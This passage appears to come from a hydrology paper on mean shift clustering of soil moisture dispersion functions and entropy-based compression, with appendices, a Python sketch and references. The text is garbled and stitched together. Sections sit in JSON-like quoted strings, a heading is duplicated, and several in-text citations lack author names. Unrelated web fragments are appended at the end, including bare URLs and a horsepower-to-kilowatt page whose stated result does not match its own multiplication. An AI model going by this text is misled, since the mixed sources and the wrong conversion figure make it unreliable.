"To further illuminate interannual changes in soil moisture patterns, we present the time series of cluster memberships for the sensors in 30 cm for the entire monitoring period in Fig. 5. From this example it becomes obvious that patterns are recurring. Years 2013 and 2014 cluster centroids look different from the following 2 years. Dispersion values increase with distance in all centroids in 2013 and 2014, while 2015 and 2016 show a sudden increase at 400–500 m (Fig. 5a–d). Years 2015 and 2016 are segmented by mean shift in a similar way, and cluster centroids reveal that the green clusters in both years are actually the same. This green cluster emerges with the occurrence of the largest rainfall event in the observation period and lasts for around 5 months. All dispersion functions within this cluster look nearly identical (see Fig. C2b). Similar observations can be made between 2014 and 2015. Here, the green and blue clusters seem to be an interannual cluster. However, in contrast to 2015/2016, the dispersion functions here are of a different shape (see Fig. C1b). Hence, the cluster transition indicated between 2014 and 2015 is indeed a real transition. When looking at cluster memberships throughout the whole period, the division into calendar years is rather meaningless, while the division into hydrological years is much more appropriate, as is reflected by the cluster membership and its changes.",
"Figure 5Soil moisture time series of all years in 30 cm depth (e) and the respective cluster centroids (a–d). The colors of the soil moisture data indicate the cluster membership of the corresponding dispersion function of the respective window position and correspond to the color of the cluster centroid (in a–d). The cumulative rainfalls (blue) and cumulative temperature sums (red) are shown for each year individually. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.\n\nDistinct summer recessions in soil moisture are only identified in 2015 and 2016. Evapotranspiration (indicated by the cumulative temperature curves in Fig. 5e) dominates over rainfall input (blue sum curve) in the soil moisture signal. Mean shift could identify a significantly distinct spatial dependency in dispersion, as shown by the two orange centroids in Fig. 5c and d. They are both distinct from the other centroids in the same period by showing only a gentle increase in dispersion. A likely reason for the absence of a distinct summer recession in 2014 is the rather wet and cold spring and summer, as can be seen from the steep cumulative rainfall curve during that period (Fig. 5e). In 2013 this identification did not work. Possible reasons are provided in the discussion Sect. 4.5.\n\n## 3.4 Redundant spatial dispersion functions\n\nWe calculated the Shannon entropy for all soil moisture time series for all years and depths (Table 2). As explained in Sect. 2.5.2 this reflects the intrinsic uncertainty of the clusters. Most entropy values are within a range of $\\mathrm{1}. The maximum possible entropy for a uniform distribution of the used binning is 3.55. The Kullback–Leibler divergence DKL is a measure of the information loss due to the compression of the cluster onto the centroid dispersion function. In the overwhelming majority of the cases, the information loss is 1 magnitude smaller than the intrinsic uncertainty and the range is $\\mathrm{0.01}<{D}_{\\mathrm{KL}}<\\mathrm{0.4}$. Hence, the information loss due to compression is negligible. There is one exception in 2016 (50 cm).\n\nTable 2Information content and information loss due to compression. The information content is given as Shannon entropy H, which is the expectation value of information in information theory. 2H gives the number of distinct states the underlying distribution can resolve. The information loss after compression is given by the Kullback–Leibler divergence DKL between the compressed and uncompressed series of dispersion functions. The last column relates DKL to H.",
"The clusters obtained in 30 cm for the year 2016 (compare Sect. 3.1) showed an entropy of 1.44. Compared to this value, the Kullback–Leibler divergence caused by compression of only 0.02 is small, if not negligible. The last column of Table 2 relates DKL to the overall uncertainty. It contributes less than one-third in almost all cases (2016; 50 cm is the only exception). In the majority of the cases it does not contribute more than 20 %.\n\nAccording to Eq. (9) the Shannon entropy is derived from a discrete, empirical probability distribution. As it is calculated using the binary logarithm, 2H gives the amount of discriminable states in this discrete distribution. This number of states is deemed to be a reasonable upper limit for the number of clusters for mean shift. A higher number of clusters than 2H appears meaningless, and this ensures that only those clusters are separated which are separated by a distance larger than the margin of uncertainty.\n\n4 Discussion\n\nIn line with our central hypothesis H1 – that radiation-driven drying and rainfall-driven wetting leave different fingerprints in the soil moisture pattern which manifests in temporal changes in the dispersion functions – we found strong evidence that soil water dynamics is organized in space and time. Our findings reveal that this organization is not static but exhibits dynamic changes which are closely related to seasonal changes in forcing regimes. A direct consequence is that soil moisture observations are quite predictable in time despite their strong spatial heterogeneity. This is in line with conclusions of, e.g., or , who also found characteristic spatial patterns to persist in time. We used the statistical dispersion of soil moisture observations in dependence of their separating distance to describe spatial patterns. The vector distance of these dispersion functions was used to cluster them. As a measure of the degree of organization we used the information loss that goes along with the compression of the entire cluster, i.e., the replacement of the cluster by the most representative cluster member. Here we found that this compression adds negligible uncertainty compared to the intrinsic uncertainty, caused by propagation of measurement uncertainties. We thus conclude that soil moisture is heterogeneous but temporally persistent over several months.\n\nIn the following we will discuss our main findings that similarity in space leads to dynamic similarity in time, the way we utilized the measurement uncertainty to determine the information content and how two different processes forcing soil moisture dynamics induce two fundamentally different spatial patterns.\n\n## 4.1 Spatial similarity persists in time\n\nWe related the dispersion of pairwise point observations to their separating distance. For brevity and due to their shape we called these relationships dispersion functions. We emphasize that this term is not meant in a strict sense, and no mathematical functional relationship, analogous to a theoretical model, has been fitted to the experimental dispersion functions. Despite the fact that the presented functions are empirical, they show clear, recurrent shapes on many occasions.\n\nWe found spatial similarity to persist in time. This is reflected in the temporal stability in cluster membership. In line with H2 – that both forcing regimes and their seasonal variability may be identified through temporal clustering of dispersion functions – the results (Figs. 
3–5) provided evidence that similar dispersion functions do in fact emerge very closely in time. Generally they appeared in continuous periods or blocks in time, and their changes coincided with changes or a switch in the forcing regimes. If we can relate the emergence of such a cluster more quantitatively to the nature and strength of a specific forcing event or process, we can analyze for how long this event or process imprints the spatial pattern of soil moisture observations. In other words: we can analyze how long a catchment state remembers a disturbance. However, an attempt to relate cluster transitions to rainfall sums and frequencies within the respective moving windows (see Fig. B1) did not yield clear dependencies.

Although cluster memberships occur in temporally continuous blocks in all depths throughout all years, in a few cases we could not relate their emergence to distinct changes in forcing. This implies that H2 needs to be partly revised.

Dispersion functions in 50 cm show a clear spatial dependency throughout the year, with distinct differences within and outside the vegetation period. At 50 cm in 2016 this is different: we find essentially two clusters that do not separate the data series by vegetation period. The shapes of the two centroids (Fig. 4f) are similar; only at large distances do they differ in value. This means that from the orange to the blue cluster, observations became more similar at large separating distances. Heavy rainfall disturbs this pattern, leading to stronger dissimilarity at larger distances, and that pattern lasted for a couple of weeks. Then, evapotranspiration-driven drying smooths out soil moisture variability, and during a similarly strong rainfall event in summer the cluster cannot emerge again, as the soil is already too dry. The soil acts as a low-pass filter here, which filters out any change in state above a specific frequency. This happens mainly due to dispersion of the infiltrating and percolating water in the soil, or due to storage in the soil matrix. By the time it reaches the deep layers, spatial differences are eliminated. This kind of behavior is well known and was already reported in the early 1990s. More recently, a study "found large variations in spatial soil moisture patterns in the topsoil, mostly related to meteorological forcing. In the subsoil, temporal dynamics were diminished due to soil water redistribution processes and root water uptake". In the same year, another study analyzed a data set of 106 locations in a forested catchment in the US for spatial organization in soil moisture patterns. The authors found a seasonal change at shallower depths (30 cm), controlled by rainfall and evapotranspiration. At deeper depths, patterns became more temporally persistent. All these findings are in line with our results and conclusions.

Mittelbach and Seneviratne (2012) decomposed a long-term (15-month) soil moisture time series into time-invariant and dynamic contributions to the spatial variance. Their data set spanned 14 sites in Switzerland at a clearly different scale (150 × 210 km). The study quantified the time-invariant contribution on average to 94 %, which leads to "a smaller spatial variability of the temporal dynamics than possibly inferred from the spatial variability of the mean soil moisture" (Mittelbach and Seneviratne, 2012, p. 2177, l. 14 ff.). This is comparable to the instances where we find long-lasting clusters while the absolute soil moisture changes considerably (e.g., Fig. 3d, early April or mid-July).
## 4.2 Uncertainty analysis

We related the evaluation of compression quality directly to the measurement uncertainty. This was achieved by Gaussian propagation of the measurement uncertainty into the dispersion functions and their distances. The latter allowed the definition of a minimum separable vector distance between two dispersion functions that are different with respect to the error margin. We based the bin width for calculating the Shannon entropy on this minimum distance, because this ensured that the Shannon entropy gives the information content of each cluster with respect to the uncertainty. On this basis it was possible to assess compression quality not only by the number of meaningful clusters found, but also based on the information lost due to compression with respect to uncertainty.

In line with H4, spatial patterns of soil moisture were found to be persistent over weeks, if not months. In many instances we found only two to four clusters within 1 year, and compression was possible with small, if not negligible, information loss. That means that during one cluster period an entire set of dispersion functions does not contain substantially more information than the centroid function. Hence, the whole cluster can be represented by the centroid function alone. We conclude that this is a manifestation of a strongly organized state which persists for a considerable time, as most observations were redundant during these periods.

Earlier work concluded that picking a random soil moisture observation location and deriving the temporal dynamics from this single sensor is more accurate than using the spatial mean of many soil moisture time series. This conclusion held for all three data sets tested. This representativity of a single sensor is, to our understanding, a manifestation of a persistent spatial pattern in soil moisture dynamics, which also enables us to compress clusters without information loss.

From Eq. (9) it can be seen that the Shannon entropy changes substantially with the binning. Therefore, it is of crucial importance to define a meaningful binning based on objective criteria. We suggest that only a discrimination into bins larger than the error margins makes sense, because smaller differences cannot be resolved given the precision of the sensors. For the application presented in this work, this is important because otherwise one could not compare the compression quality between depths or years, as different binnings lead to different Shannon entropy values, even for the same data. Hence, it would be difficult to analyze effects or differences of spatial dispersion over depth or over the years. We thus conclude that the Shannon entropy should only be used if the measurement uncertainties of the data are properly propagated.

We provided an example of how the quality of a compression can be assessed. Instead of considering the number of clusters (compression rate) only, we linked the compression rate to the resulting information loss. We could show that in the majority of the cases substantial compression rates could be achieved, accompanied by negligible information losses.
We thus suggest that the trade-off between compression rate and information loss should be used as a measure of compression quality.

## 4.3 Different dominant processes lead to different patterns

Outside of the vegetation period, we found a recurring picture of spatial dispersion functions with characteristic lengths clearly smaller than the typical extent of hillslopes. Dispersion functions were calculated in three depths for every day throughout 4 years. In most cases there is a characteristic length at which the dispersion function shows a sudden rise in dispersion. For spatial lags smaller than this distance the dispersion is usually very small; larger lags show much higher and more variable dispersion values. This characteristic length is approx. 500 m, which corresponds to a common hillslope length in the Colpach catchment. During the vegetation period, variability at large separating distances was smoothed out. Dispersion was low also at large distances, suggesting similarity even at distances larger than the typical slope length. We thus conclude that there is a dependence of the dispersion on the rainfall pattern, which is reflected in the dispersion function's shape and characteristic length. This confirms H2 and suggests that vegetation is a possible dominant factor in smoothing out soil moisture variability. A similar conclusion was drawn by Grayson et al. (1997), who identified "preferred states in soil moisture" and could relate the state transition to a significant change in the characteristic length of their geostatistical analysis. We generally found more than two clusters, but we still consider these results to be comparable. Most of the clusters identified during the vegetation period are more similar to each other than to the clusters outside of the vegetation period (and vice versa). This can be related to the "wet" and "dry" states of Grayson et al. (1997). Although conducted in a very different climate, a later study widened the separation of two preferred states into five, which were found to be explanatory for runoff generation. Interestingly, the seasonal interplay of precipitation and evapotranspiration was found responsible for transitions between states. As a further example, plant root activity has been identified as a dominant factor, changing the temporal stability of soil moisture in the upper 20 cm of the soil considerably.

Outside the vegetation period we observed multiple cluster transitions. Although more than one cluster was identified, the clusters were more similar in shape to each other than to the clusters in the "dry" summer period. In many cases these cluster transitions coincided with a shift in rainfall regimes: either the first stronger rainfall event after a longer period without rainfall sets in, or one of the heaviest rainfall events of that year occurs. There are also instances of recurring clusters that develop more than once (e.g., Figs. 3, 4a, c and 5e). As these periods are controlled by rainfall, either different rainfall patterns or different hydrological processes are dominating. Depending on antecedent wetness, rainfall amounts and rainfall intensity, infiltration and subsurface flow processes can change and thus also alter the soil moisture pattern. Although this may only be a coincidence, we found the green cluster in 2016 (Fig. 3) to form with strong rainfall input setting in after a period of little rainfall. Similar observations can be made for other years, unfortunately not in all cases.
Consequently, we can neither confirm nor reject H3 – that spatial dispersion is more pronounced during and shortly after rainfall-driven wetting conditions.

Many other works have also tried to link soil moisture patterns to forcing. One study reports, for soil moisture measurements taken on an agricultural field in Belgium, that the first rainfall events in the late growing season even out the variability which arose from heterogeneous transpiration. Although the soil moisture pattern became more homogeneous in summer in our case, we likewise suspect rainfall events after the vegetation period to be responsible for cluster transitions. Similarly, a set of modeled experiments has been presented in which precipitation consistently "produces" variability in soil moisture dynamics while transpiration reduces it. The question of how spatial patterns or their variability change with depth is also answered contradictorily in the literature: of two studies presented in a review, both investigating the variability of time-persistent soil moisture patterns over depth, one found no difference with depth, while the other reported a decrease in variability with depth. During the vegetation period no spatial dependence is detectable. For the vegetation period we usually found only one or at maximum two clusters (Table 2). These clusters are characterized by showing no dependence of dispersion on separating distance. This means that evapotranspiration, forcing the system to drier states, is doing so in a (spatially) homogeneous manner. Dispersion is not only low when the catchment is dry; it is also low while the system is drying. Similar observations have been reported for the Tarrawarra catchment in Australia. Although these works focused on the relation of spatial organization to topographic indices, no spatial correlation of soil moisture observations could be found for the dry period. This is comparable to our findings about dispersion functions during the vegetation period. It has to be noted that the lowest soil moisture values, i.e., residual moisture, are only observed for very short periods in time. At residual soil moisture all sensors show essentially the same absolute value (which leads to small dispersion as well).

We conclude that cluster transitions were often triggered by rainfall events. Not all of the strongest rainfall events caused a cluster transition, and not every cluster transition could be related to a rainfall sum or frequency within the window of the transition. The characteristics provided in Appendix B are a good starting point, but further investigations of the rainfall events, their spatial characteristics and their relation to the moisture state are needed.

## 4.4 Mean shift as a diagnostic tool

We used mean shift mainly as a diagnostic tool to cluster dispersion functions based on their similarity. Similarity is measured by the Euclidean distance between two dispersion function vectors. This Euclidean distance does, however, not provide information on the underlying cause of dissimilarity: a minor difference in the values of two dispersion functions of very similar shape can result in the same level of dissimilarity as a change in the shape of the dispersion function. We observed some cluster separations that were caused by minor differences in mean dispersion, while essentially describing the same spatial dependency.

It is possible to train better mean shift algorithm instances.
As described in the methods, we selected the bandwidth parameter for mean shift to yield meaningful results for the entire data set. The same parameter was used for all subsets to cluster dispersion functions on the same basis. This makes the clustering procedure itself comparable, and thus the number of identified clusters can support result interpretation. Nevertheless, it is likely that better bandwidth parameters can be found for each data subset individually, which would overcome misclassifications as described above. Our objective, however, was to find clustering results that can be compared directly to each other (instead of comparing hyper-parameters).

Dispersion functions live in a higher-dimensional space and might be affected by the curse of dimensionality. Mean shift clusters data points based on their distance to each other. Following the theory of the curse of dimensionality, with each added dimension (of these points), the difference between the maximum and minimum distance between points becomes less significant. On the one hand, we wish to resolve dispersion functions on as many distance lag classes as possible to gain more insight into spatial dependencies. On the other hand, each additional lag class possibly decreases the performance of mean shift (or any other clustering algorithm) and makes the results less meaningful. We calculated dispersion functions using a 30 d aggregation window and therefore end up with 335 points for mean shift. However, despite the limited number of points and the resulting uncertainty of cluster identification, the clusters identified here seem plausible.

Mean shift is sensitive to the bandwidth parameter. As described in the methods (Sect. 2.3), the bandwidth parameter has to be specified and has a direct influence on the number of clusters formed by the algorithm. We found a suitable parameter through trial and error. It would be more satisfying to infer this crucial parameter from the data or from supplementary information gathered in field campaigns. However, to our knowledge there is no such method or procedure to infer bandwidth parameters for mean shift from a data sample.

## 4.5 Limitations of the proposed method

Successful clustering does not imply spatial dependency. Mean shift can cluster functions without spatial dependency, as it uses their distance and no actual covariance between the functions. In this case the clustering is based on differences in the mean, which may not even be statistically significant. The mean shift algorithm is not meant to test clusters for statistical independence: whether two groups of points are separated or not depends only on the bandwidth parameter. Therefore the centroid function of each cluster has to be checked for its shape and the information on spatial dependency that follows from that shape.

Our approach to finding suitable bins for calculating the Shannon entropy is sensitive to outliers. We decided to define the width of the bins rather than their number. The reasons and necessity to do so were discussed in detail in Sect. 4.2. As the width we used the uncertainty propagated into the dispersion function distances; of all distances within the uncertainty margins, we used the maximum value. In cases where this maximum distance is an outlier, it will influence the whole entropy calculation. This is a limitation of our method, but an acceptable one, as it is still superior to other approaches from our point of view.
Choosing the maximum distance within each year or depth (or both) would yield more bins for the entropy calculations and therefore a wider range of values, but it would be very hard to compare these values.

From the point of view of the monitoring network, it has to be mentioned that the analysis of the 2013 data is likely to be less reliable, as during this period of installation the number of sensors was still lower than in the following years.

Due to the sampling design and the number of observation points, we did not systematically test for differences between forest and pasture plots but ran our analyses across the two land covers. The fundamentally different shapes of cluster centroids in the summer clusters, and thus the strong effect of vegetation altering soil moisture patterns, might be partly more pronounced due to the sampling design and not easily transferable to other sites. In our opinion, we would have made the same observations with a more stratified sampling design, as this is systematic catchment behavior, but we can neither confirm nor reject this.

5 Conclusions

We presented a new method to identify periods of similar spatial dispersion in a data set. While soil moisture observations might be spatially heterogeneous, spatial patterns are much more persistent in time. We found two fundamentally different states. On the one hand, there are rainfall-driven cluster formations, usually characterized by strong relationships between dispersion and separating distance and a characteristic length roughly matching the hillslope scale. On the other hand, we found clusters forming during the vegetation period. A drying and then dry soil exhibits dispersion functions which are much flatter, indicating homogeneity across space. Interestingly, these functions flatten out by minimizing the dispersion at large distance lags, which implies that dissimilarities do not increase with separating distance. We can thus see how the soil acts as a low-pass filter.

While these long-lasting periods of similar spatial patterns help us to understand how and when the soil is wetting or drying in an organized manner, there are possible applications beyond this. One could use the identification of clusters to stratify data based on spatial dispersion for combined modeling. Then, for example, a set of spatio-temporal geostatistical models or hydrological models applied to each period separately might in combination return reasonable catchment responses.

Our most interesting finding is that even a few soil moisture time series bear a considerable amount of predictive information about dynamic changes in soil moisture. We argue that distributed soil moisture reflects an organized catchment state, where soil moisture variability is not random and only a small number of observation points is necessary to capture soil moisture dynamics.

Appendix A: Mean shift algorithm

Mean shift starts by forming a cluster for each sample on its own. Here, a sample corresponds to one dispersion function. We illustrate the fundamental mechanism of the algorithm for the two-dimensional case, as the samples can then easily be plotted in ℝ² (see Fig. A1a and b). Mean shift works iteratively. In each iteration, a window is shifted over all samples, which can be thought of as coordinate points in the two-dimensional case (see Fig. A1a). This window is called a kernel and is controlled by a size parameter called bandwidth, which is a Euclidean distance between two samples.
In the two-dimensional case, this can be thought of as a circle with a radius set to the given bandwidth, as shown in Fig. A1a. At each kernel position, the center of sample density is calculated and the current sample is shifted onto this point, which is the new cluster mean, called the cluster centroid. In the next iteration, the newly created cluster centroids are used as the new (input) samples, as shown in Fig. A1b. Hence, with the bandwidth, we define a maximum Euclidean distance at which two samples are still considered to belong to the same group. The iterations stop when the shifting means converge (the centroids do not change their position anymore). We substitute the centroids calculated in the last iteration by the original sample closest to this point. Thus, we choose the most representative dispersion function for the cluster.
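For reference, the clustering step can be reproduced with the MeanShift implementation of scikit-learn (one of the packages our analysis is based on), which uses such a flat kernel. The following is a minimal sketch with random stand-in data in place of the real dispersion functions; the percentile-based bandwidth choice anticipates the rule given later in this appendix:

```python
import numpy as np
from scipy.spatial.distance import cdist, pdist
from sklearn.cluster import MeanShift

# stand-in data: 335 dispersion functions with, e.g., 10 lag classes each
rng = np.random.default_rng(42)
X = rng.random((335, 10))

# bandwidth: 30 % percentile of all pairwise Euclidean distances
bandwidth = np.percentile(pdist(X, metric="euclidean"), 30)

ms = MeanShift(bandwidth=bandwidth).fit(X)
labels = ms.labels_  # cluster membership for each dispersion function

# substitute each converged centroid by the closest original sample,
# i.e., the most representative dispersion function of each cluster
closest = cdist(ms.cluster_centers_, X).argmin(axis=1)
centroid_functions = X[closest]
```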
"Figure A1Schematic procedure of the mean shift algorithm in 2. (a) Red dots indicate hypothetical samples to be clustered. The circles illustrate the flat kernel of the centered sample at first iteration. The bandwidth parameter is illustrated by the radius. The red arrows indicate the shift of the respective sample onto the geometric mean of all samples inside the current kernel. Note that three points on the left-hand side are shifted differently, as the upper and lower points do not lie in each other's kernel. (b) Second iteration step after (a). The blue dots are the shifted means from (a) and will be used as the input sample for the next iteration. The procedure finishes when no points can be “shifted” anymore. (c) Example of a large bandwidth (radius), which will result in only one cluster at convergence. (d) Example of a too small bandwidth, where no point will be shifted at all.\n\nMean shift is sensitive to the selected bandwidth. Two clusters whose centroids are within one bandwidth length will be shifted into a combined cluster before convergence is met. As a result a bandwidth parameter chosen too big might classify all samples as a single cluster as indicated in Fig. A1c. In case the bandwidth is chosen too small, many tiny clusters with just a few members will be the result. Figure A1d shows an extreme example, where no sample will shift anywhere. We tested different bandwidth parameters at a few examples and set the bandwidth to the 30 % percentile of all pairwise Euclidean vector distances between the dispersion functions of 1 year and depth. We chose the so-called flat kernel as a kernel, which would result in a circle in the two-dimensional case and a N-dimensional sphere in N, where N is the number of lag classes used for the dispersion function.\n\nAppendix B: Auxiliary quantitative results\n\nTable B1Quantitative results summary. For each depth and cluster of 2016 different cluster characteristics were calculated. The duration of each cluster is given in the third column. To compare rainfall forcing with the emergence of clusters, the rainfall characteristics were based on the same moving window as the clusters. The mean rainfall frequency f30 within each window is given in the fourth column. The mean 30 d sum over the whole cluster ${\\sum }_{i=\\mathrm{0}}^{\\mathrm{30}}R$ in the fifth column. To assess the variability of dispersion functions within each cluster, different measures are given. γ is the dispersion, as calculated in Eq. (2). This describes the dispersion of dispersion functions within one cluster. H is the entropy of the distribution of all cluster members within each cluster. Both measures are calculated for the distribution of each distance lag class individually.",
"",
"Figure B1Mean rolling rainfall sum (a) and rainfall frequency (b) for 2016. The colored boxes indicate the current cluster as shown in Fig. 3d. Both values were calculated for the same windows as the dispersion functions by using Eq. (1) for the daily rainfall sums, with the total rainfall sum in the window in (a) and the number of days of rainfall occurring in (b).\n\nAppendix C: Detailed result plots of 30 cm in 2014 and 2015",
Appendix C: Detailed result plots of 30 cm in 2014 and 2015
"Figure C1Spatial dispersion functions in 30 cm for 2014 based on a window size of 30 d. (a) Spatial dispersion function for each position of the moving window. The red color saturation indicates the window position. The darker the red, the higher in the year. (b) The same dispersion functions as presented in (a). Here the color indicates cluster membership as identified by the mean shift algorithm. (c) Compressed spatial dispersion information represented by corrected cluster centroids. The colors match the clusters as presented in (b). (d) Soil moisture time series of 2014 in 30 cm depth. The colors identify the cluster membership of the spatial dispersion function of the current window location and match the colors in (b) and (c). The bars on the top show the daily precipitation sums. The solid blue line is the cumulative daily precipitation sum and the red line the cumulative sum of all mean daily temperatures > 5 C. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.",
"Figure C2Spatial dispersion functions in 30 cm for 2015 based on a window size of 30 d. (a) Spatial dispersion function for each position of the moving window. The red color saturation indicates the window position. The darker the red, the later in the year. (b) The same dispersion functions as presented in (a). Here the color indicates cluster membership as identified by the mean shift algorithm. (c) Compressed spatial dispersion information represented by corrected cluster centroids. The colors match the clusters as presented in (b). (d) Soil moisture time series of 2015 in 30 cm depth. The colors identify the cluster membership of the spatial dispersion function of the current window location and match the colors in (b) and (c). The bars on the top show the daily precipitation sums. The solid blue line is the cumulative daily precipitation sum and the red line the cumulative sum of all mean daily temperatures > 5 C. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.\n\nCode and data availability\n\nMajor parts of the analysis are based on the scipy , scikit-learn and scikit-gstat package . All plots were generated using the matplotlib package (Hunter2007). The full analyses of Python scripts are published on Github (https://github.com/mmaelicke/soil-moisture-dynamics-companion-code, last access: 28 April 2020) (Mälicke2019). The data are available upon request.\n\nAuthor contributions\n\nThe methodology was developed by MM, supervised by EZ and discussed with SKH. The data were provided by TB and MW. All the code was developed by MM. The manuscript was written by MM, with contributions by EZ in the introduction, discussion and formulas. SKH supplied the field and data descriptions. The structure, narrative and language of the manuscript were revised and significantly improved by TB.\n\nCompeting interests\n\nThe authors declare that they have no conflict of interest.\n\nAcknowledgements\n\nWe thank the German Ministerium für Wissenschaft, Forschung und Kunst, Baden-Württemberg, for funding the V-FOR-WaTer project. We thank the German Research Foundation (DFG) for funding of CAOS research unit FOR 1598. We especially thank Britta Kattenstroth and Tobias Vetter, the technicians in charge of the maintenance of the monitoring network. The authors also acknowledge support by the Deutsche Forschungsgemeinschaft and the Open Access Publishing Fund of the Karlsruhe Institute of Technology (KIT).\n\nFinancial support\n\nThe article processing charges for this open-access publication were covered by a Research Centre of the Helmholtz Association.\n\nReview statement\n\nThis paper was edited by Alberto Guadagnini and reviewed by two anonymous referees.\n\nReferences\n\nAlbertson, J. D. and Montaldo, N.: Temporal dynamics of soil moisture variability: 1. Theoretical basis, Water Resour. Res., 39, 1274, https://doi.org/10.1029/2002WR001616, 2003. a\n\nBárdossy, A. and Kundzewicz, Z. W.: Geostatistical methods for detection of outliers in groundwater quality spatial fields, J. Hydrol., 115, 343–359, https://doi.org/10.1016/0022-1694(90)90213-H, 1990. a\n\nBárdossy, A. and Lehmann, W.: Spatial distribution of soil moisture in a small catchment. Part 1: Geostatistical analysis, J. Hydrol., 206, 1–15, https://doi.org/10.1016/S0022-1694(97)00152-2, 1998. a\n\nBarlow, R. 
E., Bartholomew, D., Bremner, J., and Brunk, H.: Statistical Inference Under Order Restrictions: Theory and Application of Isotonic Regression, Tech. rep., Dept. of Statistics, Missouri Univ., Comumbia, 1972. a\n\nBeyer, K., Goldstein, J., Ramakrishnan, R., and Shaft, U.: When Is “Nearest Neighbor” Meaningful?, in: International conference on database theory, Springer, Berlin, Heidelberg, 217–235, https://doi.org/10.1007/3-540-49257-7_15, 1999. a\n\nBlume, T., Zehe, E., and Bronstert, A.: Use of soil moisture dynamics and patterns at different spatio-temporal scales for the investigation of subsurface flow processes, Hydrol. Earth Syst. Sci., 13, 1215–1233, https://doi.org/10.5194/hess-13-1215-2009, 2009. a, b\n\nBras, R. L.: Complexity and organization in hydrology: A personal view, Water Resour. Res., 51, 6532–6548, https://doi.org/10.1002/2015WR016958, 2015. a\n\nBrocca, L., Morbidelli, R., Melone, F., and Moramarco, T.: Soil moisture spatial variability in experimental areas of central Italy, J. Hydrol., 333, 356–373, https://doi.org/10.1016/j.jhydrol.2006.09.004, 2007. a, b\n\nBrocca, L., Melone, F., Moramarco, T., and Morbidelli, R.: Soil moisture temporal stability over experimental areas in Central Italy, Geoderma, 148, 364–374, https://doi.org/10.1016/j.geoderma.2008.11.004, 2009. a\n\nBrocca, L., Tullo, T., Melone, F., Moramarco, T., and Morbidelli, R.: Catchment scale soil moisture spatial-temporal variability, J. Hydrol., 422–423, 63–75, https://doi.org/10.1016/j.jhydrol.2011.12.039, 2012. a\n\nBronstert, A., Creutzfeldt, B., Graeff, T., Hajnsek, I., Heistermann, M., Itzerott, S., Jagdhuber, T., Kneis, D., Lück, E., Reusser, D., and Zehe, E.: Potentials and constraints of different types of soil moisture observations for flood simulations in headwater catchments, Nat. Hazards, 60, 879–914, https://doi.org/10.1007/s11069-011-9874-9, 2012. a\n\nBurgess, T. M. and Webster, R.: Optimal interpolation and isarithmic mapping of soil properties. I. The semi-variogram and punctual kriging, J. Soil Sci., 31, 315–331, https://doi.org/10.1111/j.1365-2389.1980.tb02084.x, 1980. a, b\n\nChoi, W. and Jacobs, R. L.: Influences of formal learning, personal learning orientation, and supportive learning environment on informal learning, Human Resour. Dev. Quart., 22, 239–257, 2011. a\n\nComaniciu, D. and Meer, P.: Mean shift: A robust approach toward feature space analysis, IEEE T. Pattern Anal. Mach. Intel., 24, 603–619, 2002. a\n\nCressie, N. and Hawkins, D. M.: Robust estimation of the variogram: I, J. Int. Asso. Math. Geol., 12, 115–125, https://doi.org/10.1007/BF01035243, 1980. a, b\n\nDaly, E. and Porporato, A.: A review of soil moisture dynamics: from rainfall infiltration to ecosystem response, Environ. Eng. Sci., 22, 9–24, 2005. a\n\nDe Cesare, L., Myers, D., and Posa, D.: FORTRAN programs for space-time modeling, Comput. Geosci., 28, 205–212, 2002. a\n\nDooge, J. C.: Looking for hydrologic laws, Water Resour. Res., 22, 46S–58S, https://doi.org/10.1029/WR022i09Sp0046S, 1986. a\n\nEntekhabi, D., Rodriguez-Iturbe, I., and Bras, R. L.: Variability in large-scale water balance with land surface–atmosphere interaction, J. Climate, 5, 798–813, 1992. a\n\nFukunaga, K. and Hostetler, L.: The estimation of the gradient of a density function, with applications in pattern recognition, IEEE T. Inform. Theor., 21, 32–40, 1975. a\n\nGómez-Plaza, A., Martínez-Mena, M., Albaladejo, J., and Castillo, V.: Factors regulating spatial distribution of soil water content in small semiarid catchments, J. 
We tested different window sizes, as we expect that different processes control the emergence of spatial dependence at different temporal scales. The chosen window size was the most suitable for detecting seasonal effects.

Observation point pairs further apart than 1200 m are most likely located on different hillslopes. These points might nevertheless share similar soil, topographic and terrain-aspect characteristics. Their soil moisture dynamics might thus be similar, although the points are separated by rather large distances.
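Both remarks can be made concrete with a small sketch. The snippet below is a minimal, hypothetical illustration and not the paper's actual implementation: it estimates an empirical variogram from point observations inside a moving time window and caps the pair distance, so that a maximum lag such as 1200 m and the window length (30 days here, an assumed value) are explicit tuning choices. All function and variable names are ours.

```python
import numpy as np

def empirical_variogram(coords, values, bin_edges, max_dist=1200.0):
    """Matheron estimator of the empirical variogram for one time slice.

    coords: (n, 2) array of point locations in metres
    values: (n,) array of soil moisture observations
    bin_edges: boundaries of the separating-distance classes
    max_dist: pairs further apart are ignored (likely different hillslopes)
    """
    n = len(values)
    i, j = np.triu_indices(n, k=1)                      # all unordered point pairs
    dist = np.linalg.norm(coords[i] - coords[j], axis=1)
    keep = dist <= max_dist
    dist, sq = dist[keep], (values[i][keep] - values[j][keep]) ** 2
    gamma = np.full(len(bin_edges) - 1, np.nan)
    for b in range(len(bin_edges) - 1):
        m = (dist >= bin_edges[b]) & (dist < bin_edges[b + 1])
        if m.any():
            gamma[b] = 0.5 * sq[m].mean()               # semivariance per lag class
    return gamma

def moving_window_variograms(coords, series, window=30, bin_edges=None):
    """Apply the estimator to every `window`-day slice of a (T, n) series,
    averaging the observations within each window first."""
    if bin_edges is None:
        bin_edges = np.linspace(0.0, 1200.0, 13)
    out = []
    for t0 in range(series.shape[0] - window + 1):
        mean_state = series[t0:t0 + window].mean(axis=0)
        out.append(empirical_variogram(coords, mean_state, bin_edges))
    return np.array(out)
```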
https://kw2hp.co.uk/794-hp-equals-to-how-many-kw-kilowatts/
"# 794 HP equals to how many kW (kilowatts)?\n\n794 HP after calculating to kW (kilowatts) is 583,82 kW and equals 783,12 BHP.\n\nHow to calculate that 794 HP is 583,82 kW (kilowatts)?\n\nIt’s very simple – just multiply 794 HP by 0,74. It gives 583,82 kW (kilowatts)."
https://www.had2know.org/academics/solve-absolute-value-inequality-equation.html
